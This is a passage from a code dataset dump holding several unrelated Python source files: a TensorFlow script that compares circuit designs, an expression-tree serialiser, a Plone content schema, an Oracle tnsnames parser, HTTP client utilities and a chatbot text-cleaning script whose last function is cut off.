to build the test_set for nn.\n # cluster1 = find_dsns_with_cost([1.9,3], sorted_designs, sorted_cost)\n # select_indices += random.sample(cluster1, 10)\n # select_indices += cluster1[-10:]\n # cluster2 = find_dsns_with_cost([2, 5], sorted_designs, sorted_cost)\n # select_indices += random.sample(cluster2, 5)\n # shuffle them randomly so there is no privilege because of the way we obtained them\n # random.shuffle(select_indices)\n\n #\n selected_designs = sorted_designs[select_indices]\n selected_cost = sorted_cost[select_indices]\n\n nn_inputs, nn_labels, design_costs, _ = combine(selected_designs, selected_cost)\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: 
nn_inputs,\n tf_train_labels: nn_labels,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n print(\"[Debug_test] design1, design2, costs, label, prediction, correctness\")\n\n cnt = 0\n for i in range(len(nn_inputs)):\n design1 = nn_inputs[i, :2]\n design2 = nn_inputs[i, 2:]\n costs = design_costs[i, :]\n label = nn_labels[i, :]\n prediction = predictions[i, :]\n predicted_label = 0\n if np.argmax(prediction) == np.argmax(label):\n predicted_label = 1\n cnt += 1\n print(\"[Debug_test] {} -> {} -> {} -> {} -> {} -> {} \".format(design1, design2, costs, label, prediction, predicted_label))\n print(\"[Debug_test] accuracy = {}/{} = {}\".format(cnt, len(nn_inputs), 1.0*cnt/len(nn_inputs)))\n\ndef run_model(session, design_pool, cost_pool, m_samples, ref_dsn, max_iter=1000):\n print(30*\"-\")\n print(\"[info] running model ... \")\n cnt = 0\n\n better_dsns = []\n better_dsns_costs, better_dsns_bw, better_dsns_gain, better_dsns_ibias = [], [], [], []\n better_dsns_pred = []\n for i in range(ref_dsn_idx):\n print(\"[Debug_test] dataset: {} -> {}\".format(design_pool[i], cost_pool[i]))\n print(\"[debug] ref design {} with ref cost {}\".format(design_pool[ref_dsn_idx], cost_pool[ref_dsn_idx]))\n for _ in range(max_iter):\n cnt += 1\n\n new_designs, _ = generate_data_set(1, evaluate=False)\n new_design = list(new_designs[0])\n # print(\"[debug] new_design = {}\".format(new_design))\n if any((new_design == row).all() for row in design_pool):\n # if design is already in the design pool skip ...\n # print(\"[debug] design {} already exists\".format(new_design))\n continue\n\n if random.random() < 0.5:\n input_nn = np.array(new_design + list(design_pool[ref_dsn_idx]))\n ref_label = 0\n else:\n input_nn = np.array(list(design_pool[ref_dsn_idx]) + new_design)\n ref_label = 1\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: input_nn[None, :], keep_prob: drop_out_prob}\n prediction = session.run(train_prediction, feed_dict=feed_dict).flatten()\n # print(\"[debug] design {} -> {} -> {} \".format(new_design, design_pool[0], prediction))\n\n if np.argmax(prediction) == ref_label:\n # depending on the random ordering determine if the new design sample is better than the reference design\n better_dsns.append(new_design)\n better_dsns_pred.append(prediction)\n if len(better_dsns) == m_samples:\n break\n else:\n pass\n # just a sanity check for not too complicated circuit problems: run simulation for anything to make sure\n # I'm not doing anything too stupid\n # result = evaluate_individual(new_design)\n # cost = result[0]\n # if cost < cost_pool[ref_dsn_idx]:\n # print(\"[debug] design {} with cost {} was better but missed with prediction {}\".format(new_design, cost,\n # prediction))\n\n print(\"[info] new designs tried: %d\" %cnt)\n print(\"[info] new candidates size: %d \" %len(better_dsns))\n # now if we have enough number of new potential designs we do simulation for each\n if len(better_dsns) > 0.1*m_samples:\n for i in range(len(better_dsns)):\n result = evaluate_individual(better_dsns[i], verbose=False)\n cost = result[0]\n better_dsns_costs.append(cost)\n\n return np.array(better_dsns), np.array(better_dsns_costs), np.array(better_dsns_pred)\n\ndef test_swaping(session, dataset, cost):\n\n sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n sorted_design_pool = dataset[sorted_indices]\n sorted_cost_pool = cost[sorted_indices]\n\n design1 = sorted_design_pool[ref_dsn_idx]\n cost1 = sorted_cost_pool[ref_dsn_idx]\n # design1 =\n # 
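# run_model above randomizes the pair order at inference time to avoid
# position bias; an alternative (sketch) is to query both orders and average.
# Per combine() above, label 1 means "the first design has the higher cost".
import numpy as np

def prob_new_is_better(predict, new_x, ref_x):
    # predict: maps one concatenated pair to its 2-class softmax vector
    p_new_worse = predict(np.concatenate([new_x, ref_x]))[1]
    p_ref_worse = predict(np.concatenate([ref_x, new_x]))[1]
    return 0.5 * ((1.0 - p_new_worse) + p_ref_worse)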
cost1=812\n cnt = 0\n n_samples = 1000\n\n print(\"[Debug_swapping] ref design: {} -> {}\".format(list(design1), cost1))\n\n\n # generate the designs\n if os.path.exists('genetic_nn/checkpoint/two_stage/test_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n design2s, costs = read_data['dataset'], read_data['cost']\n else:\n design2s, costs = generate_data_set(n_samples)\n write_data = dict(dataset=design2s, cost=costs)\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n for i in range(len(design2s)):\n design2 = design2s[i]\n cost2 = costs[i]\n nn_inputs = np.array([list(design1)+list(design2), list(design2)+list(design1)])\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n if np.argmax(predictions[0]) != np.argmax(predictions[1]):\n cnt += 1\n else:\n print(\"[Debug_swapping] found inconsistency in design: {} -> {}\".format(list(design2), cost2))\n print(\"[Debug_swapping] [d1,d2] -> {}\".format(predictions[0]))\n print(\"[Debug_swapping] [d2,d1] -> {}\".format(predictions[1]))\n\n print(\"[Debug_swapping] cnt=%d\" %cnt)\n\ndef test_swaping_on_train_valid(session, dataset, cost):\n\n cnt=0\n\n sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n sorted_design_pool = dataset[sorted_indices]\n sorted_cost_pool = cost[sorted_indices]\n\n nn_dataset, nn_labels, cost_arr, adjustment_weights = combine(dataset, cost)\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset :nn_dataset,\n tf_train_labels :nn_labels,\n keep_prob :drop_out_prob}\n\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n for i in range(len(nn_dataset)):\n design1 = nn_dataset[i, :num_features_per_design]\n design2 = nn_dataset[i, num_features_per_design:]\n costs = cost_arr[i, :]\n label = nn_labels[i, :]\n prediction = predictions[i, :]\n predicted_label = 0\n if np.argmax(prediction) == np.argmax(label):\n predicted_label = 1\n cnt += 1\n print(\"[Debug_test] {} -> {} -> {} -> {} -> {} -> {} \".format(design1, design2, costs, label, prediction, predicted_label))\n print(\"[Debug_test] accuracy = {}/{} = {}\".format(cnt, len(nn_dataset), 1.0*cnt/len(nn_dataset)))\n\n\ndef test_two_designs(session, design1, design2):\n # print(type(design1))\n # print(type(design2))\n\n cost1 = evaluate_individual(list(design1))[0]\n cost2 = evaluate_individual(list(design2))[0]\n\n nn_inputs = np.array([list(design1)+list(design2), list(design2)+list(design1)])\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n print(\"[test_model] design1 {} | design2 {}\".format(list(design1), list(design2)))\n print(\"[test_model] cost1 {} | cost2 {}\".format(cost1, cost2))\n print(\"[test_model] (d1,d2): {} | (d2,d1): {}\".format(predictions[0], predictions[1]))\n\ndef main():\n data_set_list,cost_set_list = [], []\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--load_model', action='store_true')\n parser.add_argument('--model_dir', type=str, default='genetic_nn/checkpoint/two_stage')\n args = parser.parse_args()\n\n\n with tf.Session(graph=graph) as session:\n\n writer = tf.summary.FileWriter(summary_dir)\n writer.add_graph(graph)\n all_vars = tf.global_variables()\n saver = tf.train.Saver(all_vars)\n if not args.load_model:\n if 
os.path.exists('genetic_nn/checkpoint/two_stage/init_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n dataset, cost = read_data['dataset'], read_data['cost']\n else:\n dataset, cost = generate_data_set(n=n_init_samples)\n write_data = dict(dataset=dataset, cost=cost)\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n print(\"Initialized\")\n train(session, dataset, cost, writer, num_epochs=num_epochs, batch_size=batch_size)\n else:\n print(\"Loading model from {}\".format(args.model_dir))\n saver.restore(session, os.path.join(args.model_dir, 'checkpoint.ckpt'))\n with open(os.path.join(args.model_dir, 'data.pkl'), 'rb') as f:\n data = pickle.load(f)\n dataset = data['dataset']\n cost = data['cost']\n\n # change test model if you want to really see how the trained model works data\n # test_model(session, dataset, cost)\n # test_model2(session, dataset, cost)\n test_swaping(session, dataset, cost)\n # test_swaping_on_train_valid(session, dataset, cost)\n\n # sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n # sorted_design_pool = dataset[sorted_indices]\n # test_two_designs(session, sorted_design_pool[ref_dsn_idx] , design2 = [45, 36, 47,77,35,9,49])\n\n\n\n # for i in range(max_n_retraining):\n # # run_model() requires sorted design pool we have so far:\n # sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n # sorted_design_pool = dataset[sorted_indices]\n # sorted_cost_pool = cost[sorted_indices]\n # # store the sorted design pool to a log file for later plotting\n # data_set_list.append(sorted_design_pool)\n # cost_set_list.append(sorted_cost_pool)\n #\n # # get the reference design for comparison\n # ref_design = sorted_design_pool[ref_dsn_idx]\n # ref_cost = cost[sorted_indices[ref_dsn_idx]]\n # print(\"[info] retraining step: {}, best design: {} -> {} \".format(i, ref_design, ref_cost))\n # new_dataset, new_cost, new_predictions = run_model(session, sorted_design_pool, sorted_cost_pool,\n # n_new_samples,\n # ref_dsn_idx, max_iter=1000)\n # if len(new_dataset) <= 0.1*n_new_samples :\n # # there are new points found that are as good as the old solutions\n # break\n # for k in range(len(new_dataset)):\n # print(\"[debug] {} -> {} -> {}\".format(new_dataset[k], new_cost[k], new_predictions[k]))\n #\n # dataset = np.concatenate((dataset, new_dataset), axis=0)\n # cost = np.concatenate((cost, new_cost), axis=0)\n # train(session, dataset, cost, writer, num_epochs=num_epochs, batch_size=batch_size)\n # print(\"[finished] best_solution = {}\".format(dataset[sorted_indices[0]]))\n # print(\"[finished] cost = {}\".format(cost[sorted_indices[0]]))\n # print(\"[finished] performance {} \".format(evaluate_individual(dataset[sorted_indices[0]]), verbose=False))\n #\n # write_data = dict(\n # data_set_list=data_set_list,\n # cost_set_list=cost_set_list,\n # )\n # with open('genetic_nn/log_files/two_stage_logbook.pickle', 'wb') as f:\n # pickle.dump(write_data, f)\n\ndef plot_cost_hist():\n\n if os.path.exists('genetic_nn/checkpoint/two_stage/init_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n dataset, cost = read_data['dataset'], read_data['cost']\n else:\n dataset, cost = generate_data_set(n=10000)\n write_data = dict(dataset=dataset, cost=cost)\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n\n sorted_indices = 
sorted(range(len(dataset)), key=lambda x: cost[x])\n sorted_design_pool = dataset[sorted_indices]\n sorted_cost_pool = cost[sorted_indices]\n print(sorted_design_pool[0], sorted_cost_pool[0])\n plt.figure(1)\n plt.hist(cost, bins=5000, range=[0,100000])\n plt.title('distribution of cost function')\n plt.show()\n\nif __name__ == '__main__':\n main()\n # plot_cost_hist()","sub_path":"genetic_nn/dsn_cmp_two_stage.py","file_name":"dsn_cmp_two_stage.py","file_ext":"py","file_size_in_byte":38938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604651452","text":"import sys\nimport uuid\n\nimport pandas\nimport pydot\n\nfrom .exceptions import MalformedExpr\nfrom .operations import OPERATIONS, OP_ALIAS\n\n\ndef _colour(dict_):\n 'Allows for the use of the British English spelling of colour.'\n americanise = lambda s: s.replace('colour', 'color')\n return {americanise(k): v for k, v in dict_.iteritems()}\n\n\ndef expression_from_dict(dict_):\n try:\n class_name = dict_['__type__']\n except KeyError:\n raise MalformedExpr('I need a `__type__` key to know '\n 'which class to instantiate.')\n expression_class = getattr(sys.modules[__name__], class_name)\n return expression_class.from_dict(dict_)\n\n\nclass ExprBase(object):\n serialisable_attrs = ()\n\n def to_dict(self):\n return {attr: getattr(self, attr) for attr in self.serialisable_attrs}\n\n @classmethod\n def from_dict(cls, json_dict):\n attrs = dict()\n for attr in cls.serialisable_attrs:\n try:\n attrs.update({attr: json_dict[attr]})\n except KeyError:\n exc = MalformedExpr\n cls_ = cls.__class__.__name__\n raise exc('Class {} requires argument {}'.format(cls_, attr))\n return cls(**attrs)\n\n def serialise(self, serialiser):\n return serialiser(self.to_dict())\n\n def resolve(self, *args, **kwargs):\n raise NotImplementedError(\"Should have implemented `resolve` method\")\n\n @property\n def node(self):\n return pydot.Node(self.node_name,\n style='filled',\n **_colour(self.node_opts))\n\n def graph(self, name=None, graph=None, parent=None):\n if not graph:\n graph = pydot.Dot(name, graph_type='digraph')\n graph.add_node(self.node)\n if parent:\n graph.add_edge(pydot.Edge(self.node, parent))\n return graph\n\n def node_name(self, *args, **kwargs):\n raise NotImplementedError(\"Should have implemented `node_name` property.\") # NOQA\n\n\nclass Expr(ExprBase):\n __type__ = 'Expr'\n serialisable_attrs = ('__type__', 'operation_name', 'arguments')\n node_opts = {\n 'fontcolour': '#FFFFFF', # White\n 'fontsize': '17.0',\n 'fontname': 'Helvetica',\n 'fixedsize': 'true',\n 'width': '0.4',\n 'height': '0.4',\n 'colour': '#FF4136' # Red\n }\n\n def __init__(self, operation_name, arguments, **kwargs):\n self.operation_name = operation_name\n self.operation = OPERATIONS.get(operation_name, False)\n if not self.operation:\n raise MalformedExpr(\n \"Unsupported operation {}\".format(operation_name))\n self.arguments = arguments\n\n @property\n def node_name(self):\n return OP_ALIAS.get(self.operation_name, self.operation_name)\n\n @classmethod\n def from_dict(cls, dict_):\n try:\n params = {'operation_name': dict_['operation_name']}\n deserialised_args = map(expression_from_dict, dict_['arguments'])\n params['arguments'] = deserialised_args\n return cls(**params)\n except KeyError:\n raise MalformedExpr('Expr object requires '\n '`operation_name` and '\n '`arguments` please pass them')\n\n def resolve(self):\n resolved_arguments = [arg.resolve() for arg in self.arguments]\n return 
self.operation(*resolved_arguments)\n\n    def graph(self, name=None, graph=None, parent=None):\n        \"\"\"\n        Build a graph of this expression, return `pydot.Dot` object.\n        Reference for colours is at http://clrs.cc/\n        To render a PNG image of the graph returned, simply call the\n        `.write_png` method with the filename you wish to write to.\n\n        Example:\n\n        >>> two = NumExpr(2)\n        >>> expression = Expr(operation_name='+', arguments=[two, two])\n        >>> graph = expression.graph('Two and two')\n        >>> graph.write_png('two-and-two.png')\n        True\n        \"\"\"\n        if not graph:\n            graph = pydot.Dot(label=name, graph_type='digraph')\n        graph.add_node(self.node)\n        if parent:\n            graph.add_edge(pydot.Edge(self.node, parent))\n        for arg in self.arguments:\n            graph = arg.graph(name, graph, self.node)\n        return graph\n\n    def to_dict(self):\n        args_as_dicts = map(lambda arg: arg.to_dict(), self.arguments)\n        return {\n            '__type__': self.__type__,\n            'operation_name': self.operation_name,\n            'arguments': args_as_dicts\n        }\n\n\nclass NumExpr(ExprBase):\n    __type__ = 'NumExpr'\n    serialisable_attrs = ('__type__', 'number')\n    node_opts = {'colour': '#7FDBFF'}  # Aqua\n\n    def __init__(self, number, **kwargs):\n        try:\n            self.number = float(number)\n        except ValueError:\n            messg = 'NumExpr must be instantiated with a `Number`.'\n            raise MalformedExpr(messg)\n\n    @property\n    def node_name(self):\n        n = self.number\n        return repr(int(n) if int(n) == float(n) else float(n))\n\n    def resolve(self):\n        return self.number
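# Round-trip sketch of the serialisation hooks above (assumes the OPERATIONS
# table maps '+' to addition, as the graph() doctest suggests; note the module
# targets Python 2, where map() in to_dict yields a list):
def _roundtrip_example():
    import json
    expr = Expr('+', [NumExpr(2), NumExpr(3)])
    blob = json.dumps(expr.to_dict())
    restored = expression_from_dict(json.loads(blob))
    assert restored.resolve() == 5.0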
\n\nclass DataFrameExpr(ExprBase):\n    __type__ = 'DataFrameExpr'\n    serialisable_attrs = ('__type__', 'dataframe')\n    node_opts = {'colour': '#FFDC00'}  # Yellow\n\n    def __init__(self, dataframe, name='auto', **kwargs):\n        if not isinstance(dataframe, pandas.DataFrame):\n            messg = 'DataFrameExpr must be instantiated with a `DataFrame`.'  # NOQA\n            raise MalformedExpr(messg)\n        self.dataframe = dataframe\n        self.name = name\n\n    @property\n    def node_name(self):\n        if self.name == 'auto':\n            return \"df@{0}\".format(hex(id(self.dataframe)))\n        return repr(self.name)\n\n    def to_dict(self):\n        return {\n            '__type__': self.__type__,\n            'dataframe': self.dataframe.to_dict(),\n            'name': self.name,\n        }\n\n    @classmethod\n    def from_dict(cls, dict_):\n        try:\n            dict_.update({\n                'dataframe': pandas.DataFrame.from_dict(dict_['dataframe']),\n            })\n            return cls(**dict_)\n        except KeyError:\n            raise MalformedExpr('DataFrameExpr object '\n                                'requires `dataframe` key, '\n                                'please pass it.')\n\n    def resolve(self):\n        return self.dataframe\n\n__all__ = (\n    'expression_from_dict',\n    'Expr',\n    'NumExpr',\n    'DataFrameExpr'\n)\n","sub_path":"expr/expressions.py","file_name":"expressions.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"88474348","text":"from five import grok\nfrom plone.namedfile.interfaces import IImageScaleTraversable\nfrom plone.namedfile.field import NamedBlobImage\nfrom plone.app.textfield import RichText\n\nfrom plone.directives import form\n\nfrom sa.overview import _\n\n\nclass IOvContent(form.Schema, IImageScaleTraversable):\n    \"\"\"\n    Description of the Example Type\n    \"\"\"\n    preview = RichText(\n        title=_(u\"Preview List Items\"),\n        description=_(u\"Please enter the items you wish to display as a \"\n                      u\"preview in listings optionally formatted as a list.\"),\n        required=False,\n    )\n    image = NamedBlobImage(\n        title=_(u\"Image\"),\n        required=True,\n    )\n    maintext = RichText(\n        title=_(u\"Main Text\"),\n        required=False,\n    )\n","sub_path":"src/sa.overview/sa/overview/content/ovcontent.py","file_name":"ovcontent.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"75449260","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 19 oct. 
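# Usage sketch for the tnsnames parser defined below (the entry name and
# address values here are illustrative):
def _tns_example():
    tns = TnsNames()
    tns.loads('MYDB = (DESCRIPTION = '
              '(ADDRESS = (PROTOCOL = TCP)(HOST = db1)(PORT = 1521))'
              '(CONNECT_DATA = (SERVICE_NAME = mydb)))')
    return tns.data['MYDB']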
2012\n\n@author: jmmasson\n'''\n\n\nclass Node:\n ''' tns object '''\n def __init__(self):\n self.name = None\n self.nodes = []\n self.value = None\n\n def parse(self, data, left=0, indent=''):\n ''' parse '''\n right = data.find('=', left)\n self.name = data[left:right].upper()\n left = right + 1\n if data[left] == '(':\n while data[left] == '(':\n left += 1\n node = Node()\n self.nodes.append(node)\n left = node.parse(data, left, indent + '-')\n if left >= len(data):\n return left\n if data[left] == ')':\n return left + 1\n else:\n return left\n else:\n right = data.find(')', left)\n self.value = data[left:right]\n return right + 1\n\n def get_boolean(self):\n value = self.value.lower()\n return value == 'on' or value == 'yes' or value == 'true'\n\n\nclass Description:\n def __init__(self):\n self.address_list = []\n self.connect_data = None\n self.failover = None\n self.load_balance = None\n\n def decode(self, nodes):\n for node in nodes:\n if node.name == 'ADDRESS_LIST':\n self.decode_address_list(node.nodes)\n elif node.name == 'ADDRESS':\n self.decode_address(self.create_address_list(), node.nodes)\n elif node.name == 'CONNECT_DATA':\n self.decode_connect_data(node.nodes)\n elif node.name == 'LOAD_BALANCE':\n self.load_balance = node.get_boolean()\n elif node.name == 'FAILOVER':\n self.failover = node.get_boolean()\n\n def decode_address_list(self, nodes):\n address_list = self.create_address_list()\n for node in nodes:\n if node.name == 'ADDRESS':\n self.decode_address(address_list, node.nodes)\n elif node.name == 'LOAD_BALANCE' or node.name == 'FAILOVER':\n address_list[node.name.lower()] = node.get_boolean()\n\n def decode_address(self, address_list, nodes):\n address = {}\n if not 'addresses' in address_list:\n address_list['addresses'] = [address]\n else:\n address_list['addresses'].append(address)\n for node in nodes:\n if node.value:\n address[node.name.lower()] = node.value\n\n def create_address_list(self):\n address_list = {}\n self.address_list.append(address_list)\n return address_list\n\n def decode_connect_data(self, nodes):\n self.connect_data = {}\n for node in nodes:\n if node.value:\n self.connect_data[node.name.lower()] = node.value\n\n def __str__(self):\n lines = ['(DESCRIPTION =']\n if self.load_balance != None:\n lines.append(' (LOAD_BALANCE = %s)' % str(self.load_balance).lower())\n if self.failover != None:\n lines.append(' (FAILOVER = %s)' % str(self.failover).lower())\n\n if len(self.address_list) == 1 \\\n and not 'load_balance' in self.address_list[0] \\\n and not 'failover' in self.address_list[0] \\\n and len(self.address_list[0]['addresses']) == 1:\n indent = ''\n else:\n indent = ' '\n\n for address_list in self.address_list:\n if indent:\n lines.append(' (ADDRESS_LIST =')\n if 'load_balance' in address_list:\n lines.append('%s (LOAD_BALANCE = %s)' % (indent, str(address_list['load_balance']).lower()))\n if 'failover' in address_list:\n lines.append('%s (FAILOVER = %s)' % (indent, str(address_list['failover']).lower()))\n for address in address_list['addresses']:\n lines.append('%s (ADDRESS = (PROTOCOL = %s)(HOST = %s)(PORT = %s))' % (indent,\n address['protocol'],\n address['host'],\n address['port']))\n if indent:\n lines.append(' )')\n\n fields = []\n for key, value in self.connect_data.iteritems():\n if value:\n fields.append('(%s = %s)' % (key.upper(), value))\n lines.append(' (CONNECT_DATA = %s)' % ''.join(fields))\n\n lines.append(')')\n return '\\n'.join(lines)\n\n\nclass Tns(Node):\n def __init__(self):\n Node.__init__(self)\n 
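# each entry of description_list is a dict of the form {'descriptions': [...]}\n        # with optional 'load_balance'/'failover' booleans, filled in by parse()\n        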
self.description_list = []\n self.load_balance = None\n self.failover = None\n\n def parse(self, data, left):\n result = Node.parse(self, data, left)\n for node in self.nodes:\n if node.name == 'DESCRIPTION_LIST':\n self.decode_description_list(node.nodes)\n elif node.name == 'DESCRIPTION':\n self.decode_description(self.create_description_list(),\n node.nodes)\n return result\n\n def data(self):\n data = {}\n if self.load_balance != None:\n data['load_balance'] = self.load_balance\n if self.failover != None:\n data['failover'] = self.failover\n data['descriptions'] = []\n for description_list in self.description_list:\n descriptions = []\n for description in description_list['descriptions']:\n data_list = {'address_list': description.address_list,\n 'connect_data': description.connect_data}\n if description.failover != None:\n data_list['failover'] = description.failover\n if description.load_balance != None:\n data_list['load_balance'] = description.load_balance\n descriptions.append(data_list)\n data_list = {'descriptions': descriptions}\n if 'failover' in description_list:\n data_list['failover'] = description_list['failover']\n if 'load_balance' in description_list:\n data_list['load_balance'] = description_list['load_balance']\n data['descriptions'].append(data_list)\n return data\n\n def create_description_list(self):\n description_list = {'descriptions': []}\n self.description_list.append(description_list)\n return description_list\n\n def decode_description_list(self, nodes):\n description_list = self.create_description_list()\n for node in nodes:\n if node.name == 'DESCRIPTION':\n self.decode_description(description_list, node.nodes)\n elif node.value:\n description_list[node.name.lower()] = node.get_boolean()\n\n def decode_description(self, description_list, nodes):\n description = Description()\n description_list['descriptions'].append(description)\n description.decode(nodes)\n\n def __str__(self):\n lines = ['%s =' % self.name]\n if len(self.description_list) == 1 \\\n and not 'load_balance' in self.description_list[0] \\\n and not 'failover' in self.description_list[0]:\n indent = ''\n else:\n indent = ' '\n\n for description_list in self.description_list:\n if indent:\n lines.append('(DESCRIPTION_LIST =')\n if 'load_balance' in description_list:\n lines.append(' (LOAD_BALANCE = %s)' % str(description_list['load_balance']).lower())\n if 'failover' in description_list:\n lines.append(' (FAILOVER = %s)' % str(description_list['failover']).lower())\n for description in description_list['descriptions']:\n if indent:\n for line in str(description).split('\\n'):\n lines.append(' %s' % line)\n else:\n lines.append(str(description))\n if indent:\n lines.append(')')\n lines.append('')\n return '\\n'.join(lines)\n\n\nclass TnsNames:\n ''' tnsnames '''\n def __init__(self):\n self.tns = {}\n self.data = {}\n\n def load(self, filename):\n lines = []\n for line in open(filename, 'r'):\n line = line.strip()\n if line.startswith('#'):\n continue\n lines.append(line.replace(' ', ''))\n self.parse(''.join(lines))\n\n def loads(self, string):\n lines = []\n for line in string.split('\\n'):\n line = line.strip()\n if line.startswith('#'):\n continue\n lines.append(line.replace(' ', ''))\n self.parse(''.join(lines))\n\n def parse(self, data):\n left = 0\n while left < len(data):\n tns = Tns()\n left = tns.parse(data, left)\n self.tns[tns.name] = tns\n self.data[tns.name] = tns.data()\n\n def __str__(self):\n lines = []\n for tns in self.tns.itervalues():\n lines.append(str(tns))\n return 
'\\n'.join(lines)\n","sub_path":"scripts/arch_work_scripts/python/tnsnames.py","file_name":"tnsnames.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"46885713","text":"\"\"\"Utilities\"\"\"\n\nfrom asyncio import StreamWriter\nimport logging\nimport ssl\nfrom typing import List, Optional\nfrom urllib.parse import ParseResult\n\nLOGGER = logging.getLogger(__name__)\n\nSCHEMES = {\n    'http': {\n        'port': 80\n    },\n    'https': {\n        'port': 443\n    }\n}\n\n\ndef get_port(url: ParseResult) -> Optional[int]:\n    \"\"\"Gets the port\n\n    :param url: A parsed url\n    :type url: ParseResult\n    :raises ValueError: Raised for an unknown scheme\n    :return: The explicit port, or the default port for the scheme\n    :rtype: Optional[int]\n    \"\"\"\n    if url.scheme not in SCHEMES:\n        raise ValueError('unknown scheme')\n    return url.port if url.port else SCHEMES[url.scheme]['port']\n\n\ndef get_target(url: ParseResult) -> str:\n    \"\"\"Gets the target\n\n    :param url: A parsed url\n    :type url: ParseResult\n    :return: The target\n    :rtype: str\n    \"\"\"\n    path = url.path\n    if url.query:\n        path += '?' + url.query\n    if url.fragment:\n        path += '#' + url.fragment\n    return path\n\n\ndef get_authority(url: ParseResult) -> str:\n    \"\"\"Get the http/2 authority\"\"\"\n    if isinstance(url.netloc, str):\n        return url.netloc\n    host, _port = url.netloc.split(':', maxsplit=1)\n    return host\n\n\ndef create_ssl_context(\n        cafile: Optional[str],\n        capath: Optional[str],\n        cadata: Optional[str],\n        protocols: List[str]\n) -> ssl.SSLContext:\n    \"\"\"Create an ssl context suitable for https\n\n    :param cafile: The path of a file of concatenated CA certificates in PEM\n        format, defaults to None\n    :type cafile: Optional[str], optional\n    :param capath: The path to a directory containing CA certificates in PEM\n        format, defaults to None\n    :type capath: Optional[str], optional\n    :param cadata: The data for a PEM encoded certificate, defaults to None\n    :type cadata: Optional[str], optional\n    :param protocols: The supported protocols\n    :type protocols: List[str]\n    :return: An ssl context\n    :rtype: ssl.SSLContext\n    \"\"\"\n    ctx = ssl.create_default_context(\n        purpose=ssl.Purpose.SERVER_AUTH,\n        cafile=cafile,\n        capath=capath,\n        cadata=cadata\n    )\n    ctx.options |= (\n        ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1\n    )\n    ctx.options |= ssl.OP_NO_COMPRESSION\n    ctx.set_ciphers(\"ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20\")\n    ctx.set_alpn_protocols(protocols)\n    try:\n        ctx.set_npn_protocols(protocols)\n    except NotImplementedError:\n        LOGGER.debug(\"Can't set npn protocols\")\n    return ctx\n\n\ndef get_negotiated_protocol(writer: StreamWriter) -> Optional[str]:\n    \"\"\"Get the negotiated protocol if any\n\n    :param writer: The writer\n    :type writer: StreamWriter\n    :return: The negotiated protocol if any.\n    :rtype: Optional[str]\n    \"\"\"\n    ssl_object: Optional[ssl.SSLSocket] = writer.get_extra_info('ssl_object')\n    if ssl_object is None:\n        return None\n    negotiated_protocol = ssl_object.selected_alpn_protocol()\n    if negotiated_protocol is None:\n        negotiated_protocol = ssl_object.selected_npn_protocol()\n    return negotiated_protocol\n","sub_path":"src/bareclient/acgi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"243108953","text":"from spellchecker import SpellChecker\n\nimport string\n\nimport 
nltk\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom nltk.stem import PorterStemmer \nfrom nltk.tokenize import word_tokenize as tokenize \nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\nfrom textblob import TextBlob\n\ndef loadCorpora():  # this function will load the corpora and return 2 lists\n\n    question=[]\n    answer=[]\n    with open('Corpora.txt') as file:\n        for sent in file.readlines():\n            terms=sent.split(\"***\")\n            question.append(terms[0])\n            answer.append(terms[1])\n\n    return question,answer\n\n\n\ndef cleanPunctuationAndLower(sentence):\n    clean=cleanPunctuation(sentence)  # clean all punctuation in the sentence\n\n    clean=clean.lower()  # convert everything to lowercase\n    return clean\n\n\n\n\ndef StemmingAndLemmatization(inputSen):\n    sen=stemming(inputSen)\n    \n    lemmd= Lemmatization(sen)\n\n    return lemmd\n\n\ndef cleanStopWordsAndSpelling(inputSen):\n\n    clean_tokens=cleanSW(inputSen)\n\n    clean_sentence=correctSpelling(clean_tokens)\n\n    return clean_sentence\n\n\ndef findsenti(inputSen):  # used to check the input sentiment\n    senti=TextBlob(inputSen)\n    return senti.polarity\n\n\n\n# helper functions\n\ndef cleanPunctuation(sentence):\n    clean=sentence.translate(str.maketrans('','',string.punctuation))  # clean all punctuation in the 